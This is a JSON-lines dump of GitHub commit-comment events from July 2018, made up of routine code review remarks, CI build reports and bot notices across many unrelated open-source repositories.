{"id":"7970033938","type":"CommitCommentEvent","actor":{"login":"mlschroe"},"repo":{"name":"openSUSE/libsolv"},"payload":{"comment":{"id":29718853,"position":null,"line":null,"path":null,"commit_id":"9b3e5ec64d775dbda5dbafec00274f92b7bd640e","created_at":"2018-07-16T11:16:33Z","updated_at":"2018-07-16T11:16:33Z","author_association":"MEMBER","body":"I could, but where would be the fun in that?"}},"created_at":"2018-07-16T11:16:33Z"}
{"id":"7970036051","type":"CommitCommentEvent","actor":{"login":"physkets"},"repo":{"name":"artix-linux/packages-galaxy"},"payload":{"comment":{"id":29718860,"position":null,"line":null,"path":null,"commit_id":"c3c0f517cc1ad60445e562a1d9b5e217f6f1c0f5","created_at":"2018-07-16T11:17:05Z","updated_at":"2018-07-16T11:17:05Z","author_association":"MEMBER","body":"Did you remove the `setcap` command from the `.install` file due to the new functionality that allows it to \"Switch to a non-privileged system user after listening sockets have been created.\" ?\r\n\r\nBut won't the binary still need that capability?"}},"created_at":"2018-07-16T11:17:05Z"}
{"id":"7970037982","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29718871,"position":null,"line":null,"path":null,"commit_id":"41f8e39f4bc39100fbd959e3a116f096f5f42629","created_at":"2018-07-16T11:17:33Z","updated_at":"2018-07-16T11:17:33Z","author_association":"NONE","body":"issue-6829 (EnergyArchmage) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2821 of 2982 tests passed, 13 test warnings)\n\nMessages:\n\n * 14 tests had: AUD diffs.\n * 131 tests had: EIO diffs.\n * 96 tests had: ESO big diffs.\n * 160 tests had: Table big diffs.\n * 58 tests had: MTR big diffs.\n * 23 tests had: ERR diffs.\n * 21 tests had: ESO small diffs.\n * 17 tests had: MTR small diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 482\n * Failed: 161\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-41f8e39f4bc39100fbd959e3a116f096f5f42629-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-41f8e39f4bc39100fbd959e3a116f096f5f42629-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-94.6%25-yellow.png)</a> \n"}},"created_at":"2018-07-16T11:17:33Z"}
{"id":"7970039527","type":"CommitCommentEvent","actor":{"login":"sdk-quadra"},"repo":{"name":"sdk-quadra/sabakutani"},"payload":{"comment":{"id":29718876,"position":null,"line":null,"path":null,"commit_id":"3e1717eccb3e322f708a406e78d0891f3b04bd01","created_at":"2018-07-16T11:17:55Z","updated_at":"2018-07-16T11:17:55Z","author_association":"OWNER","body":"いい感じ"}},"created_at":"2018-07-16T11:17:55Z"}
{"id":"7970042327","type":"CommitCommentEvent","actor":{"login":"cedel1"},"repo":{"name":"cedel1/MIA-API"},"payload":{"comment":{"id":29718880,"position":null,"line":null,"path":null,"commit_id":"36867c37bde5d36d2cec1595a642eb01e0192ce4","created_at":"2018-07-16T11:18:37Z","updated_at":"2018-07-16T11:18:37Z","author_association":"OWNER","body":"__API Description file syntax error on line 72__: the use of tab(s) '\\t' in source data isn't currently supported, please contact makers (Autogenerated message from apiary.io)"}},"created_at":"2018-07-16T11:18:37Z"}
{"id":"7970042342","type":"CommitCommentEvent","actor":{"login":"thorsteneckel"},"repo":{"name":"zammad/zammad"},"payload":{"comment":{"id":29718881,"position":null,"line":null,"path":null,"commit_id":"09313ed326138c7c7254deb741458b5151c5f0e5","created_at":"2018-07-16T11:18:37Z","updated_at":"2018-07-16T11:18:37Z","author_association":"COLLABORATOR","body":"Fixes / implements #1213"}},"created_at":"2018-07-16T11:18:37Z"}
{"id":"7970042582","type":"CommitCommentEvent","actor":{"login":"cedel1"},"repo":{"name":"cedel1/MIA-API"},"payload":{"comment":{"id":29718882,"position":null,"line":null,"path":null,"commit_id":"36867c37bde5d36d2cec1595a642eb01e0192ce4","created_at":"2018-07-16T11:18:40Z","updated_at":"2018-07-16T11:18:40Z","author_association":"OWNER","body":"__API Description file syntax error on line 72__: the use of tab(s) '\\t' in source data isn't currently supported, please contact makers (Autogenerated message from apiary.io)"}},"created_at":"2018-07-16T11:18:40Z"}
{"id":"7970043180","type":"CommitCommentEvent","actor":{"login":"nils-werner"},"repo":{"name":"nils-werner/deda"},"payload":{"comment":{"id":29718887,"position":32,"line":32,"path":"setup.py","commit_id":"8e04915ee1a52d2fd77c9edff2059b3d83a9a293","created_at":"2018-07-16T11:18:49Z","updated_at":"2018-07-16T11:18:49Z","author_association":"OWNER","body":"oops, that was a typo... apparently I only changed\r\n\r\n    license='GPL3',\r\n\r\na few lines above"}},"created_at":"2018-07-16T11:18:49Z"}
{"id":"7970043404","type":"CommitCommentEvent","actor":{"login":"cedel1"},"repo":{"name":"cedel1/MIA-API"},"payload":{"comment":{"id":29718888,"position":null,"line":null,"path":null,"commit_id":"36867c37bde5d36d2cec1595a642eb01e0192ce4","created_at":"2018-07-16T11:18:52Z","updated_at":"2018-07-16T11:18:52Z","author_association":"OWNER","body":"__API Description file syntax error on line 72__: the use of tab(s) '\\t' in source data isn't currently supported, please contact makers (Autogenerated message from apiary.io)"}},"created_at":"2018-07-16T11:18:52Z"}
{"id":"7970043956","type":"CommitCommentEvent","actor":{"login":"Doka-NT"},"repo":{"name":"mrNkravchenko/yii2"},"payload":{"comment":{"id":29718890,"position":14,"line":14,"path":"objects/CheckUserAccess.php","commit_id":"845285bac783509f432709f834590c87cb26c81c","created_at":"2018-07-16T11:19:00Z","updated_at":"2018-07-16T11:19:00Z","author_association":"NONE","body":"Отдельный класс на проверку доступа это хорошо) Удобно"}},"created_at":"2018-07-16T11:19:00Z"}
{"id":"7970046384","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29718900,"position":null,"line":null,"path":null,"commit_id":"5b5a5ea3563122dc86e9b4e4d35593b6eee36dc6","created_at":"2018-07-16T11:19:36Z","updated_at":"2018-07-16T11:19:36Z","author_association":"CONTRIBUTOR","body":"TeamCity Solution Engineering / Packer Templates [Build 529](https://ci.hashicorp.engineering/viewLog.html?buildId=104083&buildTypeId=SolutionEngineering_PackerTemplates) is now running\n"}},"created_at":"2018-07-16T11:19:36Z"}
{"id":"7970047217","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29718902,"position":null,"line":null,"path":null,"commit_id":"5b5a5ea3563122dc86e9b4e4d35593b6eee36dc6","created_at":"2018-07-16T11:19:48Z","updated_at":"2018-07-16T11:19:48Z","author_association":"CONTRIBUTOR","body":"TeamCity Solution Engineering / Packer Templates [Build 529](https://ci.hashicorp.engineering/viewLog.html?buildId=104083&buildTypeId=SolutionEngineering_PackerTemplates) outcome was **SUCCESS**\nSummary: Running Build time: 00:00:12"}},"created_at":"2018-07-16T11:19:48Z"}
{"id":"7970047225","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29718903,"position":null,"line":null,"path":null,"commit_id":"5b5a5ea3563122dc86e9b4e4d35593b6eee36dc6","created_at":"2018-07-16T11:19:48Z","updated_at":"2018-07-16T11:19:48Z","author_association":"CONTRIBUTOR","body":"TeamCity Solution Engineering / Packer Templates [Build 530](https://ci.hashicorp.engineering/viewLog.html?buildId=104084&buildTypeId=SolutionEngineering_PackerTemplates) is now running\n"}},"created_at":"2018-07-16T11:19:48Z"}
{"id":"7970047631","type":"CommitCommentEvent","actor":{"login":"anang-warpin"},"repo":{"name":"odoo/odoo"},"payload":{"comment":{"id":29718904,"position":null,"line":null,"path":null,"commit_id":"d44a4df8638a3f627d15caa5793f72dc9c0a5cdc","created_at":"2018-07-16T11:19:55Z","updated_at":"2018-07-16T11:19:55Z","author_association":"NONE","body":"why only search stock.move.line with cancel state?\r\n\r\nwhy didnt search done state too?"}},"created_at":"2018-07-16T11:19:55Z"}
{"id":"7970048017","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29718907,"position":null,"line":null,"path":null,"commit_id":"5b5a5ea3563122dc86e9b4e4d35593b6eee36dc6","created_at":"2018-07-16T11:20:01Z","updated_at":"2018-07-16T11:20:01Z","author_association":"CONTRIBUTOR","body":"TeamCity Solution Engineering / Packer Templates [Build 530](https://ci.hashicorp.engineering/viewLog.html?buildId=104084&buildTypeId=SolutionEngineering_PackerTemplates) outcome was **SUCCESS**\nSummary: Running Build time: 00:00:12"}},"created_at":"2018-07-16T11:20:01Z"}
{"id":"7970053265","type":"CommitCommentEvent","actor":{"login":"cedel1"},"repo":{"name":"cedel1/MIA-API"},"payload":{"comment":{"id":29718919,"position":null,"line":null,"path":null,"commit_id":"eb0c6b7c3d2967f3bf1b3b4937c58bb384c89a24","created_at":"2018-07-16T11:21:17Z","updated_at":"2018-07-16T11:21:17Z","author_association":"OWNER","body":"__API Description file syntax error on line 72__: the use of tab(s) '\\t' in source data isn't currently supported, please contact makers (Autogenerated message from apiary.io)"}},"created_at":"2018-07-16T11:21:17Z"}
{"id":"7970053470","type":"CommitCommentEvent","actor":{"login":"cedel1"},"repo":{"name":"cedel1/MIA-API"},"payload":{"comment":{"id":29718920,"position":null,"line":null,"path":null,"commit_id":"eb0c6b7c3d2967f3bf1b3b4937c58bb384c89a24","created_at":"2018-07-16T11:21:20Z","updated_at":"2018-07-16T11:21:20Z","author_association":"OWNER","body":"__API Description file syntax error on line 72__: the use of tab(s) '\\t' in source data isn't currently supported, please contact makers (Autogenerated message from apiary.io)"}},"created_at":"2018-07-16T11:21:20Z"}
{"id":"7970059205","type":"CommitCommentEvent","actor":{"login":"cedel1"},"repo":{"name":"cedel1/MIA-API"},"payload":{"comment":{"id":29718929,"position":null,"line":null,"path":null,"commit_id":"eb0c6b7c3d2967f3bf1b3b4937c58bb384c89a24","created_at":"2018-07-16T11:22:40Z","updated_at":"2018-07-16T11:22:40Z","author_association":"OWNER","body":"__API Description file syntax error on line 72__: the use of tab(s) '\\t' in source data isn't currently supported, please contact makers (Autogenerated message from apiary.io)"}},"created_at":"2018-07-16T11:22:40Z"}
{"id":"7970059511","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29718930,"position":null,"line":null,"path":null,"commit_id":"41f8e39f4bc39100fbd959e3a116f096f5f42629","created_at":"2018-07-16T11:22:44Z","updated_at":"2018-07-16T11:22:44Z","author_association":"NONE","body":"issue-6829 (EnergyArchmage) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-41f8e39f4bc39100fbd959e3a116f096f5f42629-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-16T11:22:44Z"}
{"id":"7970060503","type":"CommitCommentEvent","actor":{"login":"bs2609"},"repo":{"name":"MinecraftForge/MinecraftForge"},"payload":{"comment":{"id":29718933,"position":null,"line":null,"path":null,"commit_id":"fe3478f233e9b3934ddc80330cb0f333b0a7ea1a","created_at":"2018-07-16T11:22:58Z","updated_at":"2018-07-16T11:22:58Z","author_association":"CONTRIBUTOR","body":"I can't reproduce the first issue, entities go through portals fine ([MC-116279](https://bugs.mojang.com/browse/MC-116279) notwithstanding).\r\n\r\nI also tested with a modded portal using this code and it works fine, including retaining minecart contents.\r\n\r\nAs far as I'm aware the second issue is due to this:\r\nhttps://github.com/brandon3055/BrandonsCore/blob/90c15a1834adb29c7aebe3097584c94c4597dde2/src/main/java/com/brandon3055/brandonscore/lib/TeleportUtils.java#L117-L121\r\n\r\nAs that's special casing that relies on side-effects, I don't think it can reasonably be expected to ensure support here - one of the main motivations for having this PR is so that we can do without these mod-specific workarounds.\r\n\r\n\r\nAs an aside, it's better to comment on the PR, as I'd actually be notified of comments there."}},"created_at":"2018-07-16T11:22:58Z"}
{"id":"7970064512","type":"CommitCommentEvent","actor":{"login":"Doka-NT"},"repo":{"name":"Evgeny1973/gb-yii.local"},"payload":{"comment":{"id":29718946,"position":37,"line":37,"path":"models/form/CalendarForm.php","commit_id":"5f376a5bc91213b7c3a7ca8736eeb0bb89ea0904","created_at":"2018-07-16T11:23:56Z","updated_at":"2018-07-16T11:23:56Z","author_association":"NONE","body":"а еще можно выносить это в отдельный метод типа saveLinkedAccess() и вызвать его в afterSave().\r\nТогда методы будут делать 1 действие и сам метод afterSave не \"засрется\" большой логикой) Удобно)"}},"created_at":"2018-07-16T11:23:56Z"}
{"id":"7970065993","type":"CommitCommentEvent","actor":{"login":"cenka"},"repo":{"name":"cenakas/First-Python-programs"},"payload":{"comment":{"id":29718949,"position":6,"line":6,"path":"ex17.py","commit_id":"cc803e636c29cf3514d31fe97a3c70296140f146","created_at":"2018-07-16T11:24:18Z","updated_at":"2018-07-16T11:24:18Z","author_association":"COLLABORATOR","body":"from_file - nazwa pliku wejsciowego (do wczytania);\r\nto_file - nazwa pliku wyjsciowego (do zapisania, plik zostanie dopiero utworzony)"}},"created_at":"2018-07-16T11:24:18Z"}
{"id":"7970066291","type":"CommitCommentEvent","actor":{"login":"sivanbecker"},"repo":{"name":"Infinidat/dhcpawn"},"payload":{"comment":{"id":29718950,"position":null,"line":null,"path":null,"commit_id":"b5e8a26bbda6e68271bce8b8b31e98248b33fd20","created_at":"2018-07-16T11:24:23Z","updated_at":"2018-07-16T11:24:23Z","author_association":"COLLABORATOR","body":"resolves #31 "}},"created_at":"2018-07-16T11:24:23Z"}
{"id":"7970085815","type":"CommitCommentEvent","actor":{"login":"cenka"},"repo":{"name":"cenakas/First-Python-programs"},"payload":{"comment":{"id":29718991,"position":23,"line":23,"path":"ex17.py","commit_id":"cc803e636c29cf3514d31fe97a3c70296140f146","created_at":"2018-07-16T11:29:11Z","updated_at":"2018-07-16T11:29:11Z","author_association":"COLLABORATOR","body":"zawartosc zmiennej `indata` zapisujemy (przy uzyciu `.write()`)"}},"created_at":"2018-07-16T11:29:11Z"}
{"id":"7970090966","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29718998,"position":null,"line":null,"path":null,"commit_id":"4141c9eeb9ae007114479e648ee2aa1b52b1c137","created_at":"2018-07-16T11:30:24Z","updated_at":"2018-07-16T11:30:24Z","author_association":"CONTRIBUTOR","body":"TeamCity Solution Engineering / Packer Templates [Build 531](https://ci.hashicorp.engineering/viewLog.html?buildId=104085&buildTypeId=SolutionEngineering_PackerTemplates) is now running\n"}},"created_at":"2018-07-16T11:30:24Z"}
{"id":"7970091035","type":"CommitCommentEvent","actor":{"login":"cenka"},"repo":{"name":"cenakas/First-Python-programs"},"payload":{"comment":{"id":29718999,"position":29,"line":29,"path":"ex17.py","commit_id":"cc803e636c29cf3514d31fe97a3c70296140f146","created_at":"2018-07-16T11:30:25Z","updated_at":"2018-07-16T11:30:25Z","author_association":"COLLABORATOR","body":"zamykanie polaczen do pliku wejsciowego i wyjsciowego"}},"created_at":"2018-07-16T11:30:25Z"}
{"id":"7970092073","type":"CommitCommentEvent","actor":{"login":"wintstar"},"repo":{"name":"SimpleMachines/SMF2.1"},"payload":{"comment":{"id":29719000,"position":6,"line":490,"path":"Sources/ManageBans.php","commit_id":"d0fc1e3561817433ecc04759542c699b1d3a8e03","created_at":"2018-07-16T11:30:40Z","updated_at":"2018-07-16T11:30:40Z","author_association":"NONE","body":"If the blank lines here are wanted?"}},"created_at":"2018-07-16T11:30:40Z"}
{"id":"7970092813","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29719001,"position":null,"line":null,"path":null,"commit_id":"4141c9eeb9ae007114479e648ee2aa1b52b1c137","created_at":"2018-07-16T11:30:50Z","updated_at":"2018-07-16T11:30:50Z","author_association":"CONTRIBUTOR","body":"TeamCity Solution Engineering / Packer Templates [Build 531](https://ci.hashicorp.engineering/viewLog.html?buildId=104085&buildTypeId=SolutionEngineering_PackerTemplates) outcome was **FAILURE**\nSummary: Exit code 1 Build time: 00:00:26"}},"created_at":"2018-07-16T11:30:50Z"}
{"id":"7970093509","type":"CommitCommentEvent","actor":{"login":"matsest"},"repo":{"name":"HewlettPackard/POSH-HPOneView"},"payload":{"comment":{"id":29719002,"position":null,"line":null,"path":null,"commit_id":"b86da78f3371e56b9a08567da0c980aa0e3ac9dc","created_at":"2018-07-16T11:31:00Z","updated_at":"2018-07-16T11:31:00Z","author_association":"NONE","body":"@ChrisLynchHPE  Will you release this commit as a release (zip and signed exe) here, in addition to the Powershell Gallery?"}},"created_at":"2018-07-16T11:31:00Z"}
{"id":"7970100554","type":"CommitCommentEvent","actor":{"login":"MNKCrypto"},"repo":{"name":"MNKCrypto/ReentrantIssue"},"payload":{"comment":{"id":29719015,"position":45,"line":45,"path":"contracts/HoneyProcessor.sol","commit_id":"44a5860753abe842e0029718c4e51376598de087","created_at":"2018-07-16T11:32:40Z","updated_at":"2018-07-16T11:32:40Z","author_association":"OWNER","body":"Hi @xavierlepretre  Can you please elaborate more on this comment - And how do you protect from the Ether actually not making it to your attack contract? Who knows, a Solidity compiler bug?\r\n"}},"created_at":"2018-07-16T11:32:40Z"}
{"id":"7970101182","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"MNKCrypto/Splitter"},"payload":{"comment":{"id":29719016,"position":59,"line":49,"path":"contracts/Splitter.sol","commit_id":"a4eb13cc3f632a7ffc01e73bd60eb668b0db2e45","created_at":"2018-07-16T11:32:50Z","updated_at":"2018-07-16T11:32:50Z","author_association":"NONE","body":"Your logic here is very convoluted. I prefer this way:\r\n\r\n```solidity\r\nuint remainingShare = msg.value - 2 * singleShare;\r\nif (remainingShare > 0) {\r\n    userBalance[msg.sender] += remainingShare;\r\n}\r\n```"}},"created_at":"2018-07-16T11:32:50Z"}
{"id":"7970107045","type":"CommitCommentEvent","actor":{"login":"nicky-lenaers"},"repo":{"name":"nicky-lenaers/ngx-scroll-tracker"},"payload":{"comment":{"id":29719032,"position":null,"line":null,"path":null,"commit_id":"cc28537f3a35f3e4a63cf2d3968af7b7067bfaa8","created_at":"2018-07-16T11:34:15Z","updated_at":"2018-07-16T11:34:15Z","author_association":"OWNER","body":"@simcoder I no longer actively maintain this package, as it's functionality is better implemented in the native `IntersectionObserver` API, which is being adopted pretty well. I recommend you switch to that technology. Apologies for the inconvenience."}},"created_at":"2018-07-16T11:34:15Z"}
{"id":"7970108954","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"MNKCrypto/ReentrantIssue"},"payload":{"comment":{"id":29719039,"position":45,"line":45,"path":"contracts/HoneyProcessor.sol","commit_id":"44a5860753abe842e0029718c4e51376598de087","created_at":"2018-07-16T11:34:42Z","updated_at":"2018-07-16T11:34:42Z","author_association":"NONE","body":"Have a look at this example first https://github.com/b9lab/tables_turned\r\n"}},"created_at":"2018-07-16T11:34:42Z"}
{"id":"7970109018","type":"CommitCommentEvent","actor":{"login":"cedel1"},"repo":{"name":"cedel1/MIA-API"},"payload":{"comment":{"id":29719040,"position":null,"line":null,"path":null,"commit_id":"bf3bbab19777ae05add9b21ea790455bfcf6f701","created_at":"2018-07-16T11:34:43Z","updated_at":"2018-07-16T11:34:43Z","author_association":"OWNER","body":"__API Description file syntax error on line 73__: the use of tab(s) '\\t' in source data isn't currently supported, please contact makers (Autogenerated message from apiary.io)"}},"created_at":"2018-07-16T11:34:43Z"}
{"id":"7970109162","type":"CommitCommentEvent","actor":{"login":"cedel1"},"repo":{"name":"cedel1/MIA-API"},"payload":{"comment":{"id":29719041,"position":null,"line":null,"path":null,"commit_id":"bf3bbab19777ae05add9b21ea790455bfcf6f701","created_at":"2018-07-16T11:34:45Z","updated_at":"2018-07-16T11:34:45Z","author_association":"OWNER","body":"__API Description file syntax error on line 73__: the use of tab(s) '\\t' in source data isn't currently supported, please contact makers (Autogenerated message from apiary.io)"}},"created_at":"2018-07-16T11:34:45Z"}
{"id":"7970109285","type":"CommitCommentEvent","actor":{"login":"cedel1"},"repo":{"name":"cedel1/MIA-API"},"payload":{"comment":{"id":29719042,"position":null,"line":null,"path":null,"commit_id":"bf3bbab19777ae05add9b21ea790455bfcf6f701","created_at":"2018-07-16T11:34:47Z","updated_at":"2018-07-16T11:34:47Z","author_association":"OWNER","body":"__API Description file syntax error on line 73__: the use of tab(s) '\\t' in source data isn't currently supported, please contact makers (Autogenerated message from apiary.io)"}},"created_at":"2018-07-16T11:34:47Z"}
{"id":"7970111163","type":"CommitCommentEvent","actor":{"login":"mrobaczyk"},"repo":{"name":"mrobaczyk/Stockfish"},"payload":{"comment":{"id":29719047,"position":null,"line":null,"path":null,"commit_id":"4e836bbf4d100d26cfa56e136e1495199e411ba0","created_at":"2018-07-16T11:35:14Z","updated_at":"2018-07-16T11:35:14Z","author_association":"OWNER","body":"Right, I rescheduled the test. Thanks"}},"created_at":"2018-07-16T11:35:14Z"}
{"id":"7970117778","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/anaconda-project-feedstock"},"payload":{"comment":{"id":29719055,"position":null,"line":null,"path":null,"commit_id":"e7f5c5133d75deb4615244f1b29626ac22964da9","created_at":"2018-07-16T11:36:51Z","updated_at":"2018-07-16T11:36:51Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @fpliger were added to conda-forge. Welcome to conda-forge!\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @fpliger were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-16T11:36:51Z"}
{"id":"7970118313","type":"CommitCommentEvent","actor":{"login":"cedel1"},"repo":{"name":"cedel1/MIA-API"},"payload":{"comment":{"id":29719056,"position":null,"line":null,"path":null,"commit_id":"bf3bbab19777ae05add9b21ea790455bfcf6f701","created_at":"2018-07-16T11:36:58Z","updated_at":"2018-07-16T11:36:58Z","author_association":"OWNER","body":"__API Description file syntax error on line 73__: the use of tab(s) '\\t' in source data isn't currently supported, please contact makers (Autogenerated message from apiary.io)"}},"created_at":"2018-07-16T11:36:58Z"}
{"id":"7970120629","type":"CommitCommentEvent","actor":{"login":"mrbatista"},"repo":{"name":"mrbatista/loopback-edge-arangodb"},"payload":{"comment":{"id":29719066,"position":null,"line":null,"path":null,"commit_id":"5edc05359326f5db36d7ad0001e1e9d69b158f04","created_at":"2018-07-16T11:37:33Z","updated_at":"2018-07-16T11:37:33Z","author_association":"OWNER","body":"@degfra I have updated mixin source section on README. Please update to latest version (1.3.2) and see https://github.com/mrbatista/loopback-edge-arangodb#mixin-sources for a right configuration.\r\nFor any other question/problem please open an issue. Thanks."}},"created_at":"2018-07-16T11:37:33Z"}
{"id":"7970123606","type":"CommitCommentEvent","actor":{"login":"kwuaint"},"repo":{"name":"rsksmart/rskj"},"payload":{"comment":{"id":29719076,"position":null,"line":null,"path":null,"commit_id":"49e7d1e8c2ef34ab29a718c99db5a7e6be475a8a","created_at":"2018-07-16T11:38:18Z","updated_at":"2018-07-16T11:38:18Z","author_association":"NONE","body":"remove the unused package"}},"created_at":"2018-07-16T11:38:18Z"}
{"id":"7970124428","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/pyvo-feedstock"},"payload":{"comment":{"id":29719079,"position":null,"line":null,"path":null,"commit_id":"1a4a0d7712f330dbb61f8d7322a40ad64c449c67","created_at":"2018-07-16T11:38:29Z","updated_at":"2018-07-16T11:38:29Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @rayplante were added to conda-forge. Welcome to conda-forge!\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @rayplante were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-16T11:38:29Z"}
{"id":"7970124480","type":"CommitCommentEvent","actor":{"login":"jarped"},"repo":{"name":"kartverket/geosynkronisering"},"payload":{"comment":{"id":29719080,"position":4,"line":41,"path":"xsd/1.2/Tjenester/Geosynkronisering/geosync-request-respons.xsd","commit_id":"d8052c4831f0fb4baaa44d7fb29240973eb2a7dc","created_at":"2018-07-16T11:38:30Z","updated_at":"2018-07-16T11:38:30Z","author_association":"COLLABORATOR","body":"This should be reverted as we added in datasetVersion as a second parameter in OrderChangelog2"}},"created_at":"2018-07-16T11:38:30Z"}
{"id":"7970127272","type":"CommitCommentEvent","actor":{"login":"ankur220693"},"repo":{"name":"tmikolov/word2vec"},"payload":{"comment":{"id":29719088,"position":null,"line":null,"path":null,"commit_id":"e092540633572b883e25b367938b0cca2cf3c0e7","created_at":"2018-07-16T11:39:11Z","updated_at":"2018-07-16T11:39:11Z","author_association":"NONE","body":"where should i use my file name\r\n\"output.txt\" which consist of my crf_test data\r\n"}},"created_at":"2018-07-16T11:39:11Z"}
{"id":"7970138809","type":"CommitCommentEvent","actor":{"login":"ctruta"},"repo":{"name":"glennrp/libpng"},"payload":{"comment":{"id":29719115,"position":null,"line":null,"path":null,"commit_id":"8a05766cb74af05c04c53e6c9d60c13fc4d59bf2","created_at":"2018-07-16T11:42:05Z","updated_at":"2018-07-16T11:42:05Z","author_association":"COLLABORATOR","body":"The width cannot exceed PNG_UINT_31_MAX, so adding +1 here is safe."}},"created_at":"2018-07-16T11:42:05Z"}
{"id":"7970139563","type":"CommitCommentEvent","actor":{"login":"lauravignoli"},"repo":{"name":"jembi/openmrs-module-msfcore"},"payload":{"comment":{"id":29719118,"position":69,"line":69,"path":"pom.xml","commit_id":"48cbf69b12942b541080065aba149ffe4b7ec0ba","created_at":"2018-07-16T11:42:15Z","updated_at":"2018-07-16T11:42:15Z","author_association":"NONE","body":"@kaweesi Shouldn't it be version 2.1.3?"}},"created_at":"2018-07-16T11:42:15Z"}
{"id":"7970142681","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"micahu/splitter"},"payload":{"comment":{"id":29719122,"position":10,"line":21,"path":"contracts/Splitter.sol","commit_id":"9a9241ec06d18d25d4c15cdae608e8857a9caa77","created_at":"2018-07-16T11:43:00Z","updated_at":"2018-07-16T11:43:00Z","author_association":"NONE","body":"I think these 3 `bool`s are overkill."}},"created_at":"2018-07-16T11:43:00Z"}
{"id":"7970144586","type":"CommitCommentEvent","actor":{"login":"IKhushi"},"repo":{"name":"IKhushi/hello-world"},"payload":{"comment":{"id":29719125,"position":null,"line":null,"path":null,"commit_id":"64fefb63a6ad4f7ca72ac23a655903c7cc0da157","created_at":"2018-07-16T11:43:28Z","updated_at":"2018-07-16T11:43:28Z","author_association":"OWNER","body":"An Automobile Exploratory Data Analysis\r\n"}},"created_at":"2018-07-16T11:43:28Z"}
{"id":"7970150253","type":"CommitCommentEvent","actor":{"login":"IKhushi"},"repo":{"name":"IKhushi/hello-world"},"payload":{"comment":{"id":29719140,"position":null,"line":null,"path":null,"commit_id":"64fefb63a6ad4f7ca72ac23a655903c7cc0da157","created_at":"2018-07-16T11:44:50Z","updated_at":"2018-07-16T11:44:50Z","author_association":"OWNER","body":"Load Automobile data set and analyse it and find useful insights from it.\r\n"}},"created_at":"2018-07-16T11:44:50Z"}
{"id":"7970156143","type":"CommitCommentEvent","actor":{"login":"Cokemonkey11"},"repo":{"name":"wurstscript/WurstStdlib2"},"payload":{"comment":{"id":29719165,"position":20,"line":35,"path":"wurst/_handles/primitives/PrimitivesTests.wurst","commit_id":"b7b08790f47a56dcf8e34ef1e105f5aa3c8a2c96","created_at":"2018-07-16T11:46:17Z","updated_at":"2018-07-16T11:46:17Z","author_association":"NONE","body":"missing eof lf"}},"created_at":"2018-07-16T11:46:17Z"}
{"id":"7970157899","type":"CommitCommentEvent","actor":{"login":"rxmenezes"},"repo":{"name":"rxmenezes/rscreenorm"},"payload":{"comment":{"id":29719169,"position":null,"line":null,"path":null,"commit_id":"4403e63882cddca420366836b66085b9d251f646","created_at":"2018-07-16T11:46:44Z","updated_at":"2018-07-16T11:46:44Z","author_association":"OWNER","body":"This involves only the source package"}},"created_at":"2018-07-16T11:46:44Z"}
